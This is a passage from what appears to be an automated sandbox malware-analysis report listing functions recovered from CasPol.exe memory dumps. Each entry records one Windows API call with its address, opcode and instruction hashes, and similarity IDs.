                                          • Opcode Fuzzy Hash: eb4773deea6462ad7b3632e5b9866a7524a8843153bfc22befdd667b015b1dad
                                          • Instruction Fuzzy Hash: A0218E764097C09FDB12CF65DC84A92FFB4EF0A214F0984DAE9858F263D265A809DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE32547 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • ioctlsocket.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE325C3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ioctlsocket
                                          • String ID:
                                          • API String ID: 3577187118-0
                                          • Opcode ID: 980fa592b1995712f7752df3cae26696768b700318446c65cd77619689460058
                                          • Instruction ID: 52cb29cc75332c680dccefc67931597a45c4275e3179454a0b105f4f8d30cb5d
                                          • Opcode Fuzzy Hash: 980fa592b1995712f7752df3cae26696768b700318446c65cd77619689460058
                                          • Instruction Fuzzy Hash: 35218E72409384AFE712CF15DD88F56FFA8EF45310F08849AE9849F192D265A508CB66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3150E Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE31580
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          • Opcode ID: b2685079c27893105a2bdd783541e771007692bfc55a9a71aae7cc0b86b455ce
                                          • Instruction ID: e060fef09d3fa9d12ae64dee16b3278eabbcbbe8243d56ce86f3419ece1a9872
                                          • Opcode Fuzzy Hash: b2685079c27893105a2bdd783541e771007692bfc55a9a71aae7cc0b86b455ce
                                          • Instruction Fuzzy Hash: C9218E76900340AFEB20CF15DD88F96F7ECEF04711F04855AE9459B251D675E404CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45A652 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1D45A6CC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          • Opcode ID: 36cde2e70e4b13a1d4fdaaf17b4810c240d9fefb9f26a79f6b2d746c2355804f
                                          • Instruction ID: 1b7cefb140acf391a9045aa2a0e0fee08c7b67ee8b39b80e55fa91f33b8a45f9
                                          • Opcode Fuzzy Hash: 36cde2e70e4b13a1d4fdaaf17b4810c240d9fefb9f26a79f6b2d746c2355804f
                                          • Instruction Fuzzy Hash: C021AC76200740AFE721CE15CD85F67F7ECEF08720F18845AE9858B251D660F808CB72
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE31F02 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenFileMappingW.KERNELBASE(?,?), ref: 1FE31F6D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileMappingOpen
                                          • String ID:
                                          • API String ID: 1680863896-0
                                          • Opcode ID: f67626fb3d072ac1a8b4def8e378c3914cc8f3a6fa99301e6bf8afc7715cc57f
                                          • Instruction ID: 2cd003cec58cbce7880c7af043362711f32d876cdfde56c4397f5015a48a748f
                                          • Opcode Fuzzy Hash: f67626fb3d072ac1a8b4def8e378c3914cc8f3a6fa99301e6bf8afc7715cc57f
                                          • Instruction Fuzzy Hash: 8A216D71904240AFF711DF69DD89B56FBE8EF08324F08856EED488F281D775E804CA66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45AB4C Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindCloseChangeNotification.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1D45ABB8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: 63f5fd90cc66941a933e46567d5ac70778286f34957ade9e946eafacc73abace
                                          • Instruction ID: c4c33cdcb342be8161001af3ca91b4f69e02a79a71c435172896066353b03114
                                          • Opcode Fuzzy Hash: 63f5fd90cc66941a933e46567d5ac70778286f34957ade9e946eafacc73abace
                                          • Instruction Fuzzy Hash: 9A21A1725093C09FDB028B25DC95792BFB4AF07224F0D84DAE9858F263D265A908CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45A309 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindCloseChangeNotification.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1D45A378
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: ee0d7e3f4c2f2d77abcc686b45ec97c329822c86b71bd280a987d56e71a6858c
                                          • Instruction ID: 4661f3a312ffaee16222adfbb39926153408c7a2e52edf58eaabdcbf4199d989
                                          • Opcode Fuzzy Hash: ee0d7e3f4c2f2d77abcc686b45ec97c329822c86b71bd280a987d56e71a6858c
                                          • Instruction Fuzzy Hash: 0421D5755093C09FD7028F25DC85752BFB4EF07224F1884DBDC858F293D265A909CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3194A Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSASocketW.WS2_32(?,?,?,?,?), ref: 1FE319B6
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: Socket
                                          • String ID:
                                          • API String ID: 38366605-0
                                          • Opcode ID: c959546f0e005779c9bee758c23075580a0fdd4d4c8c565352ee0b40f0f10983
                                          • Instruction ID: 9aa73ac031b539232e8f4e45863c3031baa18b8412f0256cbd236f49d0bd47b4
                                          • Opcode Fuzzy Hash: c959546f0e005779c9bee758c23075580a0fdd4d4c8c565352ee0b40f0f10983
                                          • Instruction Fuzzy Hash: 37219F71904240AFE721DF69DD89B56FBE8EF08315F08895EE9858B291D375E404CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3374E Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1FE337CE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: ecd86b04b67996442334bb6dfd2467c91be558b1218a6a6448f614463ad90114
                                          • Instruction ID: 95ca3740a5d613fee721261147bbd625b0b1a56c3a94f6e2c27b1f34c4d81dc5
                                          • Opcode Fuzzy Hash: ecd86b04b67996442334bb6dfd2467c91be558b1218a6a6448f614463ad90114
                                          • Instruction Fuzzy Hash: 662171764087C0AFDB128F61DC54A92BFF0EF0B314F0985DAE9C58F163D265A419DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE32002 Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileView
                                          • String ID:
                                          • API String ID: 3314676101-0
                                          • Opcode ID: 3b6ce4f2bf37d5d2ee70763ae66b27ca37b130003e2a81fc72c6208b0a9217af
                                          • Instruction ID: 53e8dd7e4068ecf4578bebbe13a7f26e2e40c283d4fd9e2f10246ded679d306e
                                          • Opcode Fuzzy Hash: 3b6ce4f2bf37d5d2ee70763ae66b27ca37b130003e2a81fc72c6208b0a9217af
                                          • Instruction Fuzzy Hash: 6121AE71500244AFF721CF59DD89F56FBE8EF08324F04855AEA848B251D276F508CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45AE12 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          • K32GetModuleInformation.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1D45AE76
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: InformationModule
                                          • String ID:
                                          • API String ID: 3425974696-0
                                          • Opcode ID: b31680e9e44f108997fbdaeaf9af021f46318b8b1d8dbf6fa95681ec34bc3d1e
                                          • Instruction ID: b9e63a9755bb6cb868dbb178689f5ccb52804f640a3fd2f91839cb60059ade6c
                                          • Opcode Fuzzy Hash: b31680e9e44f108997fbdaeaf9af021f46318b8b1d8dbf6fa95681ec34bc3d1e
                                          • Instruction Fuzzy Hash: E211AC71640344AFEB11CF15DD89F6BFBACEF04720F14C46AE948CB241D674E8188AA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE329D6 Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenCurrentUser.KERNEL32(?,00000EA4), ref: 1FE32A39
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: CurrentOpenUser
                                          • String ID:
                                          • API String ID: 1571386571-0
                                          • Opcode ID: ca817e53efe54ae8028b6134c5ec2ef85fcf9bed8d7e57c52139ab3ebd6d96e8
                                          • Instruction ID: 74e8840d7044395f56a637642dd915e157404b6b4a0ce5d2ec247d8dabc65c9e
                                          • Opcode Fuzzy Hash: ca817e53efe54ae8028b6134c5ec2ef85fcf9bed8d7e57c52139ab3ebd6d96e8
                                          • Instruction Fuzzy Hash: 0111D371900344AFF720DF68DD89F6AFBACEF48311F04855AED449F241D274A805CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45B362 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                          Download Yara Rule
                                          APIs
                                          • MkParseDisplayName.OLE32(?,00000EA4,?,?), ref: 1D45B3E6
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: DisplayNameParse
                                          • String ID:
                                          • API String ID: 3580041360-0
                                          • Opcode ID: 73445057a9461fee0505f686afd9f580a27b4bef0338d274cade9071f5aaaf03
                                          • Instruction ID: c93ac91038752d5aa967da8507512233dd5edccca0269a39e6cdeab7e2cb7108
                                          • Opcode Fuzzy Hash: 73445057a9461fee0505f686afd9f580a27b4bef0338d274cade9071f5aaaf03
                                          • Instruction Fuzzy Hash: 571106725043806FD3118B15DC41F72BFB8EF86620F05819AED488B682D274B919CBB6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45A873 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1D45A8E2
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 679e49ca2230225889c8b42468c9310e264a5589b4a00af15ea61f1a7388da2c
                                          • Instruction ID: d7247c3fac147a03b0754cc6ac4bc36e4098c622c4fc08f89609f6d5e428c8b9
                                          • Opcode Fuzzy Hash: 679e49ca2230225889c8b42468c9310e264a5589b4a00af15ea61f1a7388da2c
                                          • Instruction Fuzzy Hash: 5721A272504380AFD711CF25DC45B63BFE8EF46210F0884AAED85CB252D225E808CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE32BDA Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegNotifyChangeKeyValue.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE32C44
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ChangeNotifyValue
                                          • String ID:
                                          • API String ID: 3933585183-0
                                          • Opcode ID: 60dfb421c7be9a1a72dbc806ce9400c5a91cff0be824ae7b85446dc55f26bbb5
                                          • Instruction ID: e2d1413e37091e7385aa2194f9c05d2e082c3f8337e431df75a8fbde38f5d6ea
                                          • Opcode Fuzzy Hash: 60dfb421c7be9a1a72dbc806ce9400c5a91cff0be824ae7b85446dc55f26bbb5
                                          • Instruction Fuzzy Hash: 1A118171400344EFEB21CF51DD88F9AFBACEF04311F04855AE9849B241D675E408CBB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE31C66 Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExW.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE31CD8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          • Opcode ID: ef04fdeff35ed3e440c40b836fb2b89da251d18928c29fb7b17889a47ee70798
                                          • Instruction ID: b760fbe6adec5aa7d0f8cd5111e30488255d537ee7438374ca6b64295f33a4b0
                                          • Opcode Fuzzy Hash: ef04fdeff35ed3e440c40b836fb2b89da251d18928c29fb7b17889a47ee70798
                                          • Instruction Fuzzy Hash: 1611AC76A00740AFE721CF11DD88F56FBFCEF08711F14855AE9459B251D664E808CBB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE330AC Relevance: 1.6, APIs: 1, Instructions: 64networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetNetworkParams.IPHLPAPI(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE33124
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: NetworkParams
                                          • String ID:
                                          • API String ID: 2134775280-0
                                          • Opcode ID: 86fd108cec888fe5156347f001631563f345c5d3be05a3b04449e4104d7d779e
                                          • Instruction ID: afb3f3f64d85feb4a84d77a931da428507c6c89f067b0b2a26dad58775b00bba
                                          • Opcode Fuzzy Hash: 86fd108cec888fe5156347f001631563f345c5d3be05a3b04449e4104d7d779e
                                          • Instruction Fuzzy Hash: 2711D371508384AFE712CB11DC88F56FFB8EF45320F08809AF9849F292C264A808CB72
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3247E Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessTimes.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE324DD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ProcessTimes
                                          • String ID:
                                          • API String ID: 1995159646-0
                                          • Opcode ID: 6518908a4cbee10ffe2acf1d2c087c7b6d4b394fb5f9858246039ede0358bbee
                                          • Instruction ID: df94d8832a2b1a391d76c513b279d23d3106f878899154016c865691a9804c29
                                          • Opcode Fuzzy Hash: 6518908a4cbee10ffe2acf1d2c087c7b6d4b394fb5f9858246039ede0358bbee
                                          • Instruction Fuzzy Hash: 9C11D072500340AFEB21CF65DD88F5AFBA8EF04321F04856AE9858B281D675E804CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE32826 Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAEventSelect.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE3288A
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: EventSelect
                                          • String ID:
                                          • API String ID: 31538577-0
                                          • Opcode ID: 8eeba302ef686e15b3fca3c508292571b39e14a5860249a9ac3eb80e7d0d553d
                                          • Instruction ID: 36cef3db7fb702ed5280d97fe6b17643e79f9a36951ab9ee583c2822566b8b12
                                          • Opcode Fuzzy Hash: 8eeba302ef686e15b3fca3c508292571b39e14a5860249a9ac3eb80e7d0d553d
                                          • Instruction Fuzzy Hash: 53118272900344AFE711DF55DD88F9AF7ACEF44321F04856AE9849F241D674E508CBB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45AD2A Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                          • K32EnumProcessModules.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1D45AD86
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: EnumModulesProcess
                                          • String ID:
                                          • API String ID: 1082081703-0
                                          • Opcode ID: 0fb01095bdb44394952c5ea373867d69d5ca3ac6fa49bf0001a879bbfa00ddf2
                                          • Instruction ID: ccae0746c0fb77afa37e30bf537f97abe927d9726785c4543ee3b0f3e448b249
                                          • Opcode Fuzzy Hash: 0fb01095bdb44394952c5ea373867d69d5ca3ac6fa49bf0001a879bbfa00ddf2
                                          • Instruction Fuzzy Hash: 4211E272500380EFEB11DF15DD85F5BFBA8EF44721F14846AE9448B241D674E8088B72
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3096E Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadFile.KERNEL32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE309CD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: bb67a5067fe411573c5f5636c0c95c787930ec2fb9a2a301abfe28d858325c5a
                                          • Instruction ID: 54513330600ab94568df325e9acc23d41295ead90cd2b218077d70b976ee0ec9
                                          • Opcode Fuzzy Hash: bb67a5067fe411573c5f5636c0c95c787930ec2fb9a2a301abfe28d858325c5a
                                          • Instruction Fuzzy Hash: 2911C472400744EFFB21CF51DD88F5AFBA8EF44315F04855AEA489F251D275A404CBB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE315DA Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1FE31638
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID:
                                          • API String ID: 1890195054-0
                                          • Opcode ID: da933fda50e86234ea01302bbc8a20506e703200412177fe9bf87c11825200ee
                                          • Instruction ID: 80f7c30f8545665d008654dbe5078e9b95e53cf40d8a42ad975ad10307d83b2a
                                          • Opcode Fuzzy Hash: da933fda50e86234ea01302bbc8a20506e703200412177fe9bf87c11825200ee
                                          • Instruction Fuzzy Hash: 961190755093C09FD7128B65DC84B52BFB4EF06224F0C84EBED858F263D275A808CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE3256A Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                          Download Yara Rule
                                          APIs
                                          • ioctlsocket.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE325C3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: ioctlsocket
                                          • String ID:
                                          • API String ID: 3577187118-0
                                          • Opcode ID: b99991aee6dfdaf7e8be1a4ba2e501f4dedce5609f72c6cd501c865b91cda584
                                          • Instruction ID: b04e679cacb5b701b22478c8986bbfe9b1e9f026397c58f51d3d2347b6e95dfd
                                          • Opcode Fuzzy Hash: b99991aee6dfdaf7e8be1a4ba2e501f4dedce5609f72c6cd501c865b91cda584
                                          • Instruction Fuzzy Hash: 8D11A071904340EFEB11CF15DD88F5AFBA8EF44321F08856AE9849F241D675A904CBB6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE323AE Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                          Download Yara Rule
                                          APIs
                                          • shutdown.WS2_32(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE32404
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: shutdown
                                          • String ID:
                                          • API String ID: 2510479042-0
                                          • Opcode ID: 2ea0e163e6b290e4a94f836a8fe68bf25b698ad3680f911500c00c0c9092d8d1
                                          • Instruction ID: a580b76562eb82f881b6a2086b861202023ba2ef113c813abfb0bd65ce325a7f
                                          • Opcode Fuzzy Hash: 2ea0e163e6b290e4a94f836a8fe68bf25b698ad3680f911500c00c0c9092d8d1
                                          • Instruction Fuzzy Hash: 5911A071900340AFEB11CF15DD88B5AFBA8EF44321F048496E9449F241D674A404CBA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE335EE Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetAdaptersAddresses.IPHLPAPI(?,00000EA4,E552CEA1,00000000,00000000,00000000,00000000), ref: 1FE3364D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: AdaptersAddresses
                                          • String ID:
                                          • API String ID: 2506852604-0
                                          • Opcode ID: 97296ffbe0d1991f2e7fda35c6e1c9e6311470058cda6d846a19198dea6d48b7
                                          • Instruction ID: e8d438ff8030abb89526736712048a6fac87d361e29c5d285e3dcc31d0c588bc
                                          • Opcode Fuzzy Hash: 97296ffbe0d1991f2e7fda35c6e1c9e6311470058cda6d846a19198dea6d48b7
                                          • Instruction Fuzzy Hash: 67119E75500740AFFB21CF11DD89F66FBA8EF48720F04855AE9454B351D275E808CBB6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FE338C6 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6697150293.000000001FE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FE30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fe30000_CasPol.jbxd
                                          Similarity
                                          • API ID: FindWindow
                                          • String ID:
                                          • API String ID: 134000473-0
                                          • Opcode ID: bec9983bebb0392541ce1719b026fc69767f4cb769070a5bbfc7528cc3368207
                                          • Instruction ID: de78cfa2fc25b0a6d871083e2c317ca54f23af4eeb1eefaef78a5c1d1ee4cd88
                                          • Opcode Fuzzy Hash: bec9983bebb0392541ce1719b026fc69767f4cb769070a5bbfc7528cc3368207
                                          • Instruction Fuzzy Hash: ED118F729083809FE711CB25DC85B52BFF8EF46225F09809AED858F267D264E848CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45A48A Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(?,E552CEA1,00000000,?,?,?,?,?,?,?,?,73793C68), ref: 1D45A4E8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d45a000_CasPol.jbxd
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: b9907440d5cc0de359babe318c20f4c3dbb02466e80622522b8da82af3bf58b5
                                          • Instruction ID: 63ad5517f57c4baa19ede8c1b8db2f600c4ed630905d98aba740ed2a9787e840
                                          • Opcode Fuzzy Hash: b9907440d5cc0de359babe318c20f4c3dbb02466e80622522b8da82af3bf58b5
                                          • Instruction Fuzzy Hash: 32118F754093C4AFD7138B25DC84A62BFB4DF47224F0980DBED858F2A3D265A809CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D45BEBE Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(?,00000EA4), ref: 1D45BF27
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669280271.000000001D45A000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D45A000, based on PE: false
                                          Joe Sandbox IDA Plugin
